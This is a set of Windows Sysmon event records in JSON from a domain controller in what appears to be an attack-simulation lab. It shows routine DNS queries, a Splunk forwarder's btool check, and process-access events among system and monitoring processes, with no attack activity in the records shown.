{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1910,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.009\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: win-dc-8400769\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.009","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"win-dc-8400769","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1911,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.320\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nProcessId: 2460\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.320","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.724\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-00106CCB0300}\r\nSourceProcessId: 4088\r\nSourceThreadId: 4084\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.724","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-00106CCB0300}","SourceProcessId":"4088","SourceThreadId":"4084","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-00106CCB0300}\r\nTargetProcessId: 4088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-00106CCB0300}","TargetProcessId":"4088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.784\r\nProcessGuid: {E2A3D6B1-106D-5F25-0000-00109FD90300}\r\nProcessId: 4056\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.784","ProcessGuid":"{E2A3D6B1-106D-5F25-0000-00109FD90300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nTargetProcessId: 4056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","TargetProcessId":"4056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nTargetProcessId: 4056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","TargetProcessId":"4056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
